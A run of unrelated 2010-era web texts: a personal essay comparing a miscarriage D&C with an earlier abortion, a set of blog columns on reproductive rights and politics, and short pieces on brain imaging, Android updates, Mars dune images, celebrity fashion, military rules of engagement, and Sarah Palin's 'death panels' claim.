At this point , the Stupak debate was occurring .
I was getting emails from Planned Parenthood , NARAL , Feminist Majority , etc. asking me to contact my Representatives to make sure that Stupak was excluded from the final House bill .
On November 3rd , we had a sonogram and saw it - it looked like a pulsing piece of rice .
We could n't help but get a little excited by that .
We spent the week talking about how excited we were , our plans , how we would need to fix up the third bedroom , whether we should stay in the place we 're renting or find somewhere else ( and what it would be like to move while pregnant - yikes ! ) , etc .
And then on November 10th , we went back for another sonogram just to make sure things were moving along normally ( there was some question about the timing and hormones ) , and the little grain of rice was n't pulsing anymore .
Miscarriage .
The doctor sent us for a second opinion .
I was supposed to drink 16 ounces of water and hold it until after this sonogram .
So I hopped around the waiting room hoping that I 'd make it until the sonogram was over .
We laughed about this because it really was funny .
The funeral of the Fort Hood soldiers was on TV and the FOX news anchor read the President 's address without telling anyone it was the President 's address ( basically implying that these were his own words ) .
I asked the receptionist to change the channel because if I was going to be tortured one way , I should n't have to deal with FOX News on top of it all .
They finally called us back and started the sonogram .
I finally peed ( seriously , that was terrible ) , and then she did more looking around .
She looked very solemn , which pretty much confirmed that it was a miscarriage .
I asked , " So , no pulsing , that means a miscarriage , right ? " - and she actually got tears in her eyes .
She said she'd have the doctor look at the photos and that they 'd send them back to our doctor and we should go back to that office and wait .
The doctor confirmed what we all already knew and then gave us options .
Option 1 : Wait it out and let the miscarriage happen naturally .
Option 2 : D&C .
I chose the D&C . I was n't waiting for anything .
My thoughts were , the faster it 's gone , the faster we can try again .
I knew we would likely have to wait a few months for things to get back to normal and I wanted to start asap .
I did n't cry .
My husband never cries .
We knew this was a possibility and we were ready for it .
The doctor suggested that the emotions would hit after the D&C .
We scheduled that appointment for the 13th .
I do n't like having my blood taken , and I was a little nervous about pain , but I was ready to get it over with .
I went to the hospital for registration and they asked me 100 questions - including whether or not I wanted to keep it and have a funeral .
This prompted me to wonder , " Who does that ? ! "
I told the registration nurse that I was n't worried about having a funeral for something that looked like a grain of rice .
She asked what my religious affiliation was ( because apparently some people like to have religious leaders visit them ? ) , and I said " none . "
I arrived at the hospital early that morning for the D&C and we waited around for a while .
The anesthesiologist came in and we talked about how things would work .
I went to sleep and woke up in recovery .
My husband came in after a short time .
I watched another man in the recovery room who was struggling a bit and I hoped he'd be okay .
I decided I was hungry .
They brought me a turkey sandwich .
Everyone came in to check on me and remind me of my follow up appointment with my doctor and then we left .
I sat on the couch for a few days and watched TV .
I calculated out how long we'd have to wait and when we'd be likely to get pregnant again .
I got an email from my insurance company letting me know they 'd received the claims and processed them .
The amount I owed ? $ 0 .
The D&C is the same procedure I had when I was 19 - when I had an abortion .
What a contrast .
When I was 19 , I had to scrape together $ 350 - borrowing from a sister and some friends .
I arrived at the clinic near St. Louis and had to be escorted from the car to the door by a security guard while protesters chanted and yelled at me - demanding that I change my mind .
I had to have counseling before the procedure because apparently my mental state was in question .
I left the building feeling like I wanted to throw up - and did .
My friend drove me back to Carbondale and I slept for most of the weekend .
One of my friends at the time found out I 'd had an abortion and decided that she could n't be my friend anymore .
No real loss there , as she apparently was n't my friend to begin with .
Same procedure .
Exact same procedure .
This time around every nurse , every receptionist , every ultrasound tech , everyone said they were sorry .
Everyone wanted to be sure I was okay .
Everyone expected me to cry .
Everyone assumed I would be distraught .
No one questioned my choice to have a D&C .
No one defriended me .
I did n't need a security guard to guide me from the car to the door and back .
I did n't have to drive two hours out of my way to go to a special clinic .
No one wanted to submit me to counseling to make sure my mental state was what they thought it should be .
And because I 'm lucky to have good insurance , I did n't have to worry about how I would scrape together the money for the procedure .
This is the experience every woman should have .
Everyone deserves to have their privacy respected .
Everyone deserves to have their choice honored .
Everyone deserves to have their relationship with their doctor respected .
Everyone deserves to have health insurance that covers their medical procedures ( whatever those procedures may be ) .
Everyone deserves to feel secure when they go in for a procedure .
Everyone deserves to have the same experience I did .
And I know I will likely spend my entire life fighting to make that a reality .
◆◇◆◇◆◇◆◇◆ ◇
PROMISES , PROMISES : Pounding the Glass Platform
by LeanneB , SheKos editor
I have noted in the past that , when it comes to defending women 's reproductive freedom , the Democratic party talks a good game but frequently fails to deliver what it promises .
But I suppose even that could be considered a kind of progress , because in the beginning , they did n't even talk a very good game .
For instance , here 's the language touching on reproductive freedom in the 1976 Democratic platform , three years after the Roe v. Wade decision :
We fully recognize the religious and ethical nature of the concerns which many Americans have on the subject of abortion .
We feel , however , that it is undesirable to attempt to amend the U.S. Constitution to overturn the Supreme Court decision in this area .
Hard - hitting , huh ?
Fortunately , the platform of 1980 offered a more committed statement about a woman 's right to choose , with only a hint of apology at the beginning :
We fully recognize the religious and ethical concerns which many Americans have about abortion .
We also recognize the belief of many Americans that a woman has a right to choose whether and when to have a child .
The Democratic Party supports the 1973 Supreme Court decision on abortion rights as the law of the land and opposes any constitutional amendment to restrict or overturn that decision .
So in just four years , we 've gone from " It 's the Supreme Court 's fault ! " to " This is the law of the land and we oppose efforts to alter that . "
There is also a welcome acknowledgment that women are in control of their own reproductive decisions .
Unfortunately , we lost that presidential election .
And then , of course , Ronald Reagan proceeded to do his best to stamp out the fledgling flame of female reproductive uppity - ness -- in between deregulating every industry in sight and making America safe for greater poverty .
The Democrats seem positively morose in the 1984 platform .
This is reflected in a section entitled , The Future if Reagan is Reelected :
There can be little doubt that a Supreme Court chosen by Ronald Reagan would radically restrict constitutional rights and drastically reinterpret existing laws .
Today , the fundamental right of a woman to reproductive freedom rests on the votes of six members of the Supreme Court — five of whom are over 75 .
That right could easily disappear during a second Reagan term .
I might 've gone with a forceful statement about what Democrats planned to do to protect reproductive freedom , but that 's just me .
Anyway , Reagan won and did , indeed , get a chance to appoint some conservative Justices , just as the Cassandra - like Dem platform said he would .
The platform of 1988 is a bit of an anomaly in various respects .
The reproductive choice language is buried in the middle of a dense hodge - podge of civil rights promises :
We further believe that we must work for the adoption of the Equal Rights Amendment to the Constitution ; the fundamental right of reproductive choice should be guaranteed regardless of ability to pay ; [ emphasis mine ]
Yes , blink and you might miss it , but it 's worth noting that this is the first time the Democratic platform included the words " regardless of ability to pay . "
So despite the anemic treatment of the topic of choice , this platform did manage to set one important precedent .
Well , two precedents , unfortunately ; the inclusion of this language made many Democrats in Congress official traitors to pro-choice constituents every year when they re-approved the Hyde Amendment .
Beginning with the Clinton campaigns , reproductive rights receive an entire section in the platform entitled Choice :
[ 1992 ]
Democrats stand behind the right of every woman to choose , consistent with Roe v.
Wade , regardless of ability to pay , and support a national law to protect that right .
It is a fundamental constitutional liberty that individual Americans — not government — can best take responsibility for making the most difficult and intensely personal decisions regarding reproduction .
The goal of our nation must be to make abortion less necessary , not more difficult or more dangerous .
We pledge to support contraceptive research , family planning , comprehensive family life education , and policies that support healthy childbearing and enable parents to care most effectively for their children .
The 1996 includes all the same elements , plus a lot of extra verbiage insisting that the party supports doing everything possible to make abortions unnecessary .
It also includes this first - time addition :
The Democratic Party is a party of inclusion .
We respect the individual conscience of each American on this difficult issue , and we welcome all our members to participate at every level of our party .
I think we 've found that smelly place where Democratic betrayals such as the Stupak Amendment are spawned .
The above statement also made its way into the 2000 platform , with significant expansion :
The Democratic Party is a party of inclusion .
We respect the individual conscience of each American on this difficult issue , and we welcome all our members to participate at every level of our party .
This is why we are proud to put into our platform the very words which Republicans refused to let Bob Dole put into their 1996 platform and which they refused to even consider putting in their platform in 2000 : " While the party remains steadfast in its commitment to advancing its historic principles and ideals , we also recognize that members of our party have deeply held and sometimes differing views on issues of personal conscience like abortion and capital punishment .
We view this diversity of views as a source of strength , not as a sign of weakness , and we welcome into our ranks all Americans who may hold differing positions on these and other issues .
Recognizing that tolerance is a virtue , we are committed to resolving our differences in a spirit of civility , hope and mutual respect . "
In other words , here is our " policy , " but you can vote however you 're comfortable and we 'll still call you a Democrat .
This verbiage was purged , however , from the 2004 [ pdf ] platform :
We will defend the dignity of all Americans against those who would undermine it .
Because we believe in the privacy and equality of women , we stand proudly for a woman 's right to choose , consistent with Roe v. Wade , and regardless of her ability to pay .
We stand firmly against Republican efforts to undermine that right .
At the same time , we strongly support family planning and adoption incentives .
Abortion should be safe , legal , and rare .
And finally , we come to the current platform , ratified in 2008 :
The Democratic Party strongly and unequivocally supports Roe v. Wade and a woman ’s right to choose a safe and legal abortion , regardless of ability to pay , and we oppose any and all efforts to weaken or undermine that right .
The Democratic Party also strongly supports access to comprehensive affordable family planning services and age - appropriate sex education which empower people to make informed choices and live healthy lives .
We also recognize that such health care and education help reduce the number of unintended pregnancies and thereby also reduce the need for abortions .
The Democratic Party also strongly supports a woman ’s decision to have a child by ensuring access to and availability of programs for pre- and post-natal health care , parenting skills , income support , and caring adoption programs .
We have definitely come a long way from where we started .
The platform now clearly states that women have a right to make their own reproductive choices in accordance with Roe v. Wade and regardless of financial circumstances .
But we 're seeing more extra conditions being added to reassure the more conservative members of the party that we 're not " pro-abortion " -- lots of talk about reducing the need for abortions and supporting adoption programs and so forth .
None of which I would mind if there was also an understanding within the party that you vote according to the platform and not according to your religion .
And without such a stipulation , I have to wonder how much progress supporters of reproductive freedom can honestly claim .
◆◇◆◇◆◇◆◇◆◇◆◇
OUT OF THE SILENCE : It Is About Life
by rb137
The arguments against abortion strip the discussion of all complexity .
In the end , those arguments leave women with few solutions to the dire problems that they face in their private lives .
The life of the child dogma polarizes the debate .
Any conversation that starts with one side accusing the other of murder does not have resolution as a primary goal .
The dogma is a bludgeon , designed to build a movement by keeping the two camps from talking with one another .
And this simplicity is essential to the anti-abortion crusade .
It forces pro-choice advocates to assume a defensive position or start with apologetics .
The secondary arguments then become a form of " blaming the victim , " something that already happens to women far too often .
It 's her fault .
She was irresponsible .
The only reason that she finds herself in this unfortunate position is that she acted badly .
And if she gets an abortion , she is a horrible person .
This finger pointing makes the propaganda easy to sell .
The anti-abortion crusade depends on vilifying the opposition .
It can not embrace the path of least suffering , even in cases where circumstances find a pregnancy tragically complicated , where termination is the kindest answer .
The need to engage the path of least suffering gets swept away by the will of God , which means there is still controversy over cases of rape , incest , and threats to the life of the mother .
The truth is that real life rarely seems complicated until it happens .
Nobody knows what they will do until they are put to the test .
When it happens to their own delicate flower .
Before Roe v.
Wade , young girls were forced to the back alley by their parents and boyfriends .
Abortion was n't always the woman 's choice .
It still is n't today .
Criminalizing abortion does not stop it from happening .
It only guarantees that women will be in danger .
Reproductive rights are under threat today , by a worldview that quickly falls like a house of cards when applied to real people and real events .
Unless we speak out and challenge that simplistic way of thinking -- and talk to the people who maintain it -- that house will remain standing .
It is up to us to tell the stories .
◆◇◆◇◆◇◆◇◆◇◆◇◆◇
THIS WEEK IN WOMEN'S HISTORY : A Rocky Road to Reproductive Freedom
by joedemocrat
On January 22 , 1973 , the United States Supreme Court ruled in Roe v. Wade that the Constitution protects a woman ’s right to have an abortion .
One hundred years earlier , the 1873 Comstock law made it illegal to send any contraceptive device or information through the mail .
Margaret Sanger ( 1879 - 1966 ) successfully challenged this law , promoted the use of birth control and founded Planned Parenthood .
Countless state and local statutes restricted access to birth control .
In the 1965 case of Griswold v. Connecticut , the Supreme Court overturned the 1879 Connecticut law that made the use of contraceptives -- even by married couples - - a criminal act .
This established a constitutional right to reproductive privacy , and set an important precedent for Roe v. Wade .
Unfortunately , the struggle for reproductive freedom has remained difficult since Roe .
Opponents have sought to place as many legal , practical and financial restrictions as possible to limit access to abortion .
In 1976 , Congress passed the Hyde Amendment , prohibiting the use of federal funds for abortions , by a 207 - 167 vote .
The Hyde Amendment was challenged as unconstitutional in Harris v. McRae ( 1980 ) but the court upheld the amendment .
Congress votes annually to renew Hyde .
Despite Hyde 's firm prohibition on public funding , opponents of choice injected the inflammatory issue into the 2009 health care reform debate .
The House passed the Stupak - Pitts Amendment , which causes onerous complications for women getting insurance for comprehensive reproductive care under any of the new proposed plans .
◆◇◆◇◆◇◆◇◆◇◆◇◆◇
WOMEN IN THE WORKPLACE : How Employers Can Limit Your Rights
by pat of butter in a sea of grits
Reproductive freedom in America may also be constrained by a woman 's employer .
For those who are lucky enough to have a ) a job in 2010 and b ) employer sponsored health insurance as part of their benefits package , about 86 percent of those plans cover contraception .
According to recent reporting by The American Prospect magazine , 90 percent of private insurance plans cover abortion today - - a number that would undoubtedly decline if the Stupak Amendment became law .
Over 70 percent of Americans support the inclusion of women 's reproductive health services in health care coverage .
Reproductive freedom includes the choice to use contraception , use abortion services , or to give birth .
As we discussed in an earlier column , the United States lags far behind the rest of the world on family leave policy , including maternity leave .
The U.S. is one of only four countries in the world that does not mandate paid maternity leave for employees .
The others ?
Liberia , Swaziland , and Papua New Guinea .
In any other country , new moms are assured of keeping their job and being paid for at least six weeks , often up to a year , after giving birth .
Many countries also require paid paternity leave , to allow dads the time to bond with their little ones as well .
Breastfeeding accomodation policies in the workplace vary from state to state .
Much progress on this issue has been made in the past decade , but we still have a ways to go .
43 states allow women to breastfeed in any public or private location , but only 24 states have laws related to breastfeeding in the workplace .
Women who are pumping milk at work need a clean , private location with a lockable door .
( A bathroom stall is n't good enough , folks !
Would you eat on the toilet ? )
Also necessary : an outlet where they can plug in their pump ; and a fridge where they can store their bagged milk .
I was fortunate enough when my first child was born to work in a place that had a designated breastfeeding room with a hospital grade pump , locking door and refrigerator .
Many women can't even get break time , let alone a private spot , to pump milk for their infants .
◆◇◆◇◆◇◆◇◆◇◆◇◆◇
RECOMMENDED READING : Perspectives on Choice
by dirkster42
In keeping with the focus on Roe v. Wade , I 've selected three books for this week 's recommended reading .
The most powerful treatment of the subject that I 've read is Beverly Wildung Harrison 's Our Right to Choose : Toward a New Ethic of Abortion .
Harrison shifts the ethical question away from the usual one , which pits fetal " rights " versus women 's rights ( although she does have a chapter on this ) .
Instead , she focuses on the question that shows how political -- and explosive -- the stakes are : " Who Shall Control the Power to Reproduce the Species . "
Rather than grounding the right to choose in notions of privacy , Harrison 's perspective raises a broad political question about a fundamental social act -- how society continues .
Harrison is a Presbyterian ethicist , and her book includes chapters on theology and church history .
This book has been out of print for some time , so it may be difficult to acquire .
I 'm going out on a limb and recommending a book I 've only skimmed , but it looks indispensible from what I 've seen : Abortion and Woman 's Choice : The State , Sexuality , and Reproductive Freedom by Rosalind Petchetsky .
Finally , for a more historical view , see Janet Farrell Brodie , Contraception and Abortion in Nineteenth - Century America .
◆◇◆◇◆◇◆◇◆◇◆◇◆◇
GLBT NEWS THE KAT DRAGGED IN : Reproductive Rights Are For Same - Sex Couples Too
by KentuckyKat
When many people think of reproductive freedom , they think of abortion ... maybe birth control .
Not everyone immediately thinks of GLBTs .
The reproductive challenges that we face are in many ways different , but are the same in the ways that matter .
We face the abrogation of our free will by politicians and those who would impose their morals upon us .
Because my knowledge and experience lies in this direction , I will focus on female couples .
This is not because gay couples and couples including a transgendered individual do not face equal challenges , but because I do not feel qualified to opine on the particular issues faced by them .
In Ireland , the Supreme Court recently granted de facto parental rights to a lesbian couple 's sperm donor .
At the time of his contribution , he apparently did not express any desire to retain parental rights .
Instead , he was to be a favored " uncle " -- without any formal privileges or responsibilities .
Later , after his friendship with the child 's mothers deteriorated , he changed his mind .
When the women attempted to move to Australia with their now three - year - old son , the sperm donor sued and obtained an injunction to keep the child in the country while he fought for his alleged rights as a biological parent .
Given that lesbians ( and female bisexuals in relationships with another woman ) cannot have the biological child of either woman without the use of a sperm donor , such a decision is immensely troubling .
But , lest you think that America is far safer for same - sex parents , one need only look to the Texas case of Ward v. Ward [ pdf ] .
In that case , a child was taken away from a single lesbian mother and placed in the custody of the father , a man convicted of second degree murder in the death of his first wife .
In explaining the ruling , the judge stated that it was important that the child grow up in a " non-lesbian world . "
Despite that horrid ruling , there have been key victories in the United States .
The California Supreme Court has held that doctors illegally discriminated against a lesbian plaintiff when they refused to provide her with artificial insemination based on the religious views of her " lifestyle . "
Those of us who do not live in California may face a bleaker legal landscape , however .
President Obama has indicated that we should expect a robust conscience clause from his administration .
( A conscience clause allows medical providers not to provide care if it conflicts with their personal religious beliefs . )
I hope and trust that President Obama will protect the rights of GLBTs to be treated equally to their straight counterparts .
But I would be lying if I pretended that that comment did not frighten me .
◆◇◆◇◆◇◆◇◆◇◆◇◆◇
EAR ON CULTURE : Michelle Obama 's First Year : She Did It HER Way
by Muzikal203
Michelle Obama ’s first year as First Lady of the United States of America has come and gone , and I think it was an amazing first year .
I freely admit that I have n’t been paying attention to politics my entire life , at least not as closely as I have in the last year .
I also freely admit that I ’m more than a little biased when it comes to Michelle Obama .
I can honestly say that in the last year I have seen Michelle Obama do things that I never imagined I ’d see a First Lady do .
I think perhaps the biggest impact she will have is on the young men and women in the Washington D.C. area .
In the past year I have seen and heard countless accounts of her going to schools and talking to teens or stopping in an elementary school to visit a class and read them a book .
She 's even invited some famous friends to start a mentoring program with a group of 10th and 11th graders .
She invited those children and youth to essentially become a part of the Obamas ’ extended family .
She has gone to soup kitchens without a lot of fanfare and donated her time .
Imagine how you ’d feel if you were down on your luck and you had to go in to a soup kitchen , and you walked in and there was the First Lady of the United States smiling and joking with you and serving you food .
That ’s not something I could imagine any other First Lady ( in my admittedly short lifetime of only 26 years ) doing .
She started a White House Garden an instead of simply hiring gardeners to come in and do the work , she did the work and she had children from a local school come in and help her .
When the garden was ready to harvest , she then took them into the White House kitchens and showed them what they can do with the food .
Again , something I could n’t imagine any other First Lady doing .
The garden has produced over 1,000 pounds of food , and some of that food has been donated to Miriam 's Kitchen a local soup kitchen where Michelle volunteered .
She even hula hooped and played double dutch , I definitely ca n’t see any other First Lady doing that .
Maybe it ’s because she ’s one of the youngest First Ladies ever , or maybe it ’s just that she cares that much .
The White House is once again " the People ’s House " mostly because Michelle Obama wanted to open it back up .
Even something like the White House Blue Room Christmas tree became a symbol for how she wants to bring the country together and walk the walk instead of simply talking the talk .
∗ ∗ ∗ ∗ ∗
Sure , she has n’t been doing the DC social scene , but she reached out to the people who mattered most .
Not the ones who could afford to have exclusive parties where the President and First Lady show up , but the ones who probably never thought they ’d ever get to hang out with the President and First Lady .
You were more likely to see Barack and Michelle Obama if you were just a regular person than you were if instead you were a part of the DC social scene .
I ’m sure that really pissed a lot of people off , but Michelle Obama still continued to do things her way .
∗ ∗ ∗ ∗ ∗
To top it all off , she still remains first and foremost Sasha and Malia ’s mother .
Her daughters are clearly her life .
Even with all she ’s doing as First Lady she has not once compromised being a good mother .
This is something that everyday women do all the time .
They have careers and they still take care of their families .
Sure they have their support systems , but no one can take the place of a mother ’s care and attention .
Heck , she even had time to walk the dog regularly ( something I think I recall her saying she would n’t do before they got him ) .
I recently read an article where she commented that he daughters are still the same kids they were when they left Chicago .
I think that 's not only a testament to Sasha and Malia for being the level headed young women they are , but it's also a testament to Michelle Obama for making sure that her daughters continued to be raised as normal children , or at least as normal as possible given the circumstances .
She even told the staff that the girls have to make their own beds in the morning and do chores .
∗ ∗ ∗ ∗ ∗
I think what Michelle Obama has shown America is that it ’s perfectly okay to just be a Mom .
It ’s perfectly okay to be who you were before you " arrived " , and if anyone has " arrived " it ’s definitely the Obamas .
She has shown future First Ladies that there are more important things than merely smiling for the cameras , it ’s important to walk the walk .
It ’s important to not lose sight of who you are outside of your position .
I ca n’t even imagine how many lives she ’s personally touched in the DC area by simply being who she is .
And I ca n’t fail to note that she ’s happy with who she is , even going so far as to check in with her older friends to make sure she has n’t changed after being in the bubble that is Washington DC .
∗ ∗ ∗ ∗ ∗
I suppose I would be remiss if I did n't mention her husband in all of this .
The last year has certainly been a challenging one for our President .
He 's had to make some really hard decisions , a lot of which were unpopular not just on DKos but in the " real world " as well .
We all know that he keeps a cool head , he 's just a cool guy .
Personally , I think it helps that he 's surrounded by a family he loves when he goes home .
He never looks quite as happy as he does when he's with his wife and children .
The Obamas are always quick to tell people that their marriage is n't perfect , and of course every relationship has its issues , but they are an excellent example of how a husband and wife could and should work together .
She is his rock , and he 's not afraid to admit that .
I 'll even go so far as to say he would n't be where he is today if Michelle Obama was n't who she is .
They called her " The Closer " on the campaign trail , and anyone who listened to Michelle Obama speak about her husband and his vision for America could n't help but at least give the man a second look if not vote for him .
∗ ∗ ∗ ∗ ∗
Through this year Michelle Obama has been criticized for just about everything from touching the Queen of England ( who was also touching her at the time ) to wearing shorts when it was hot outside .
What she wore was criticized as if she was supposed to be dressing to please us .
Even a new haircut is somehow news .
Through it all she ’s kept her head up , she ’s stayed true to herself , and she did it all HER way .
The less you use your brain 's frontal lobes , the more you see yourself through rose - colored glasses , a University of Texas at Austin researcher says .
Those findings are being published in the February edition of the journal NeuroImage .
" In healthy people , the more you activate a portion of your frontal lobes , the more accurate your view of yourself is , " says Jennifer Beer , an assistant professor of psychology , who conducted the research with graduate student Brent L. Hughes .
" And the more you view yourself as desirable or better than your peers , the less you use those lobes . "
The natural human tendency to see oneself in a positive light can be helpful and motivating in some situations but detrimental in others , Beer says .
Her research , conducted at the university 's Imaging Research Center , gives new insight into the relationship among brain functions and human emotion and perceptions .
It may help scientists better understand brain functions in seniors or people who suffer from depression or other mental illnesses .
It could also have implications for recovering methamphetamine addicts whose frontal lobes are often damaged by drug use and who can overestimate their ability to stay clean .
As part of the study , 20 subjects answered questions about how they compared to their peers on such positive traits as tact , modesty , likability and maturity and such negative traits as materialism , messiness , unreliability and narrow - mindedness .
As the subjects answered those questions , a magnetic resonance imaging ( MRI ) machine scanned their brains .
The subjects who viewed themselves in a very positive light across those disparate areas used their orbitofrontal cortex less than the other subjects .
This region of the frontal lobe is generally associated with reasoning , planning , decision - making and problem - solving .
Some subjects who had accurate views of themselves showed four times more frontal lobe activation than the most extreme " rose - colored glasses " wearer in the study .
Among a separate set of subjects who were asked the same questions , those who were required to answer quickly saw themselves in a far more positive light than those who had unlimited time to answer .
Those findings suggest that processing information in a more deliberate manner may be the way in which frontal lobe activation permits people to come to more realistic conclusions .
" Subjects made unrealistically positive judgments about themselves more quickly , suggesting these judgments require fewer mental resources , " Beer says .
" Perhaps , like the visual system , the social judgment system is designed to give us a quick ' good enough ' perception for the sake of efficiency . "
Do n't worry Droid & Cliq owners , you 're not going to be left in the dark .
Motorola also announced that they 'll be bringing both the Motorola Droid & Motorola Cliq to Android 2.1 .
Which means we should be able to enjoy all the goodies that made the Nexus One so jaw - droppingly sexy on our Motorola Android phones .
We 're definitely interested in seeing Motoblur and Android 2.1 interact , but that 's a discussion for another day .
But the news does n't stop there for Droid owners .
Not only will they receive Android 2.1 but Motorola has been working on Flash 10.1 integration and has optimized it for the Droid chipset , which means yes , your Droid will soon have official Flash support .
On top of that , the Droid should get a second maintenance update in the near future .
Score big for Droid .
Since yesterday was n't such a good day to be a Droid owner , today is shaping up totally different !
What do you guys think ?
[ via @palmsolo ]
This new image of Mars taken by NASA 's Mars Reconnaissance Orbiter shows an optical illusion .
What appears to be trees rising from the Martian surface are actually dark streaks of collapsed material running down sand dunes due to carbon dioxide frost evaporation .
The image was released in Jan. 2010 .
Naturallyerupting dust clouds on Mars are creating structures that look surprisinglylike trees near the planet 's north pole .
But do n't be fooled ?
it 's just anoptical illusion , NASA scientists say .
The Martian" trees " are actually dark basaltic sand pushed to the surface of sand dunes by sun-heated solid carbon dioxide ice , or dry ice , sublimating directly into vapor , explained Candy Hansen , a member of NASA 'sMars Reconnaissance Orbiter ( MRO ) team at the University of Arizona .
The sanddunes form a nearly complete ring around Mars ' north pole and are covered by athin layer of reddish Martian dust and patches of dry ice .
To date , there is nofirm evidence of any type of Martian biology , past or present , plant orotherwise .
In the Martian spring , the sun warms the ice , causing it to sublimate directly into vapor , and the resulting gas dislodges surrounding dust and sand particles .
" Whatwe think is happening is that the dark sand is sliding down the bright frostedportion of the dune , " Hansen told SPACE.com .
The image , taken by MRO 's High Resolution Imaging Science Experiment ( HiRISE ) camera , ispart of a series of Martian images appearing in a special issue of the journal Icarus this month .
The Martianillusion is not the first to capture the imaginations of people on Earth .
In 1976 , a photograph of a rock formation on Mars beamed to Earth by NASA ?
sViking 1 orbiter looked to many like a face carved in the Martian surface .
The Face onMars photo ?s legacy has survived to this day , even after additionalobservations by more advanced spacecraft have revealed it to be a trick oflight and shadows .
Since then , other Martian illusions have popped up in images from orbiters and rovers , including an object that resembled a small bunny and a rock that looked like a female figure to some and Bigfoot to others .
The streaks in the new imagelook as if they are rising up from the sand dunes , but that 's an illusion , Hansen said .
" You 're looking at the slip face of the dune , and where thesand comes to a stop , it forms a sort of scallop - shaped edge at thebottom . "
Each darksand streak can measure up to 164 feet ( 50 meters ) in length .
HiRISEactually caught one of the dust eruptions as they happened .
" Ifyou look closely , you can see this little dust cloud casting a tinyshadow , " Hansen said .
So this is interesting : Our friends at Gothamist are calling out famed fashion critic Cathy Horyn for calling Mad Men ‘s famed curvy star Christina Hendricks “ big ” in a blog post about Golden Globes fashion .
They ’re also saying that the photo that ran with the piece was distorted by the New York Times to help prove Horyn ’s point .
( We think it could just as easily be the work of a not - so - skilled at resizing photo intern . )
Here ’s exactly what was said :
Not pretty Christina Hendricks in Christian Siriano ’s exploding ruffle dress .
( As one stylist said , “ You do n’t put a big girl in a big dress .
That ’s rule number one . ” )
We thought she looked striking in her ruffles — granted , we think Joan Holloway could pull off a paper bag .
In fact , we gave her our award for Best “ Golden Globes . ”
That said , bitchiness about size is nothing new in fashion ( no matter how many stories suggest otherwise ) , and Horyn is a widely - respected critic who battled her own weight issue not long ago .
Maybe that ’s where the passive aggressive dig is coming from ?
Update : The New York Times has admitted that the image was incorrect .
“ The photo was slightly distorted inadvertently due to an error during routine processing .
The photograph has been replaced . ”
The Taliban and drug gangs have hit a snag with their media campaign against the American and NATO use of smart bombs .
For the last few years , the Taliban have been using human shields to protect themselves from the smart bombs .
The civilian deaths that followed caused the foreign troops to change their ROE ( Rules of Engagement ) , to limit the use of the bombs when human shields were in play .
Civilian casualties , from smart bombs declined , and Afghans began to notice that even more civilians were being killed by Taliban bombs and attacks .
So the Taliban came up with a new idea ; getting a ban on foreign troops raiding Afghan homes at night .
The Taliban and drug gangs had no trouble persuading local journalists to run with this ( bribes or death threats were applied ) , and now the Afghan media is full of heart wrenching tales of women and children terrified when American or NATO troops charge in after midnight .
There were no stories published about how those night visits often catch bad guys asleep , and enables troops to make arrests without any gun battles .
NATO has responded by issuing new rules restricting the use of night raids .
Not surprisingly , one of the biggest gripes combat troops in Iraq and Afghanistan have is the Escalation of Force ( EOF ) and Rules of Engagement ( ROE ) procedures they must follow when faced with enemy action , or the threat of enemy action .
These rules have gotten more complex year by year , although there have been some attempts to simplify the complications ( if that makes any sense . )
Put simply , the ROE / EOF stuff is there to limit civilian casualties , while fighting a foe that wants dead civilians ( for their propaganda impact ) .
Al Qaeda even has an official name for this ; " involuntary martyrs . "
The U.S. buzzword is " collateral damage . "
Naturally , there 's a big difference between the ROE / EOF stuff that is regularly delivered to the troops ( who are supposed to demonstrate that they have memorized them ) , and what actually happens in combat .
For all the ROE / EOF exhortations directed at the troops , there is also an escape clause .
That is , you are always allowed to use any force necessary to protect yourselves .
This does not negate ROE / EOF , and if you kill a bunch of civilians , there will be an investigation .
If you can not make some kind of case that you fired in ( what appeared to you at the time to be ) self - defense , you will get punished .
The troops know this , the brass know this .
No one is sure if the lawyers , who are sometimes brought in to help out with the periodic ROE / EOF training sessions , know this .
Lawyers are generally considered the enemy , since they tend to spend most of their time telling you what you cannot do in combat ( whether you 're fighting for your life or not . )
Troops who have spent more than a year in Iraq or Afghanistan have come to believe that the biggest problem with ROE / EOF is that the people who create this stuff have done a very bad job of explaining the cause and effect of it all .
While the troops can understand that , " killing civilians " is usually counterproductive , the brass rarely go to any great lengths to explain the thinking behind the long list of ROE / EOF things you can , or cannot , do .
There is a belief that the ROE / EOF is not well thought out , and the lawyers are sent in to lecture the troops in an attempt to hide that fact .
Definitely a credibility gap here .
There 's a reason the Tea Party crowd still believes in " death panels " -- namely , because Sarah Palin , who coined the term , keeps claiming that they really do exist still .
Nevermind , of course , that it has long been exposed as a complete falsehood , and was named " Lie of the Year " by PolitiFact .
To right - wingers like Sarah Palin , though , you can lie through your teeth , tell the press that up is down , that a report finding you guilty of various abuses of power as Alaska 's governor in fact actually " completely exonerates " you -- and everyone will stand around and pretend like it 's just another point of view .
So she repeated it again last night on Hannity :
Hannity :
You stand by those comments because you think it still exists in the bill .
Palin : I do .
It 's a commission , it 's bureaucracy , it 's bureaucrats who will ration care if the bill goes through as Obama wants it to go through .
Yes -- it 's modeled , in essence , after a British system that does have people to decide whether , based on your quality of life , your age , whether you 're gonna deserve health - care coverage or not -- that 's what 's gonna happen in America if this health - care bill is n't stopped , and it needs to be stopped soon , and that 's why the people of this land can't give up in demanding that their voice be heard , demanding that the White House understand that this is a representative form of government , we do expect that the will of the people is listened to and adhered to and implemented via our representatives , who we elect .
Eh ?
The British system has no such " commissions . "
As the AP recently reported , officials in Britain recently repudiated claims like Palin's :
The criticism , widely covered in the U.K. media , has clearly stung Britain 's left - leaning Labour government .
The Department of Health took the unusual step of contacting The Associated Press and e-mailing it a three - page rebuttal to what it said were misconceptions about the NHS being bandied about in the U.S. media – each one followed with the words : " Not true . "
At the top of the list was the idea that a patient in his late 70s would not be treated for a brain tumor because he was too old – a transparent reference to Grassley 's comments about Kennedy .
And what of Republicans ' claim that British patients are robbed of their medical choices ?
False again , the department said .
" Everyone who is cared for by the NHS in England has formal rights to make choices about the service that they receive , " it said in its rebuttal .
Then followed a fact sheet comparing selected statistics such as health spending per capita , infant mortality , life expectancy , and more .
Each one showed England outperforming its trans-Atlantic counterpart .
The British government offers health care for free at the point of need , a service pioneered by Labour in 1948 .
In the six decades since , its promise of universal medical care , from cradle to grave , is taken for granted by Britons to such an extent that politicians – even fiscal conservatives – are loath to attack it .
Apparently Palin is referring to British cost - containment measures :
The NHS has a body called the National Institute for Health and Clinical Excellence ( NICE ) that decides which new treatments and drugs the NHS should pay for .
One of the factors NICE considers when deciding whether to approve funding for a new treatment or drug is cost - effectiveness .
